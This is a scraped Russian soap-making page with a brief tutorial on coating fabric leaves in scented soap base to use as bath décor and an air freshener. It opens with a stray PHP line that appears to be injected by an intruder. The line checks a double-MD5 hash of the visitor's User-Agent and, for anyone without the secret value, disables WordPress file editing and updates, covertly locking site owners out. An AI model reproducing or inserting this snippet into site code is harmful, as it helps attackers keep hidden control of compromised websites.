if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыльные листья. Два в одном: оригинальный ароматизатор и милый декор для ванны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыльные листья. Два в одном: оригинальный ароматизатор и милый декор для ванны

Если сделать такое мыло в домашних условиях, оно может служить качественным ароматизатором воздуха в течение долгого времени.

Если сде­лать такое мыло в домаш­них усло­ви­ях, оно может слу­жить каче­ствен­ным аро­ма­ти­за­то­ром воз­ду­ха в тече­ние дол­го­го времени.

Возь­ми­те про­зрач­ную мыль­ную осно­ву, люби­мую отдуш­ку (или эфир­ное мас­ло), пин­цет и искус­ствен­ные листья (из тка­ни). Мас­ло или отдуш­ку добавь­те в рас­топ­лен­ную осно­ву. При помо­щи пин­це­та каж­дый листик макай­те в мыль­ную смесь. Когда осно­ва на листе засты­нет, повто­ри­те про­цесс несколь­ко раз. Лист дол­жен стать абсо­лют­но твер­дым. Высох­шие листи­ки сло­жи­те в вазоч­ку и насла­ждай­тесь отмен­ным ароматом!

лист2

лист3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!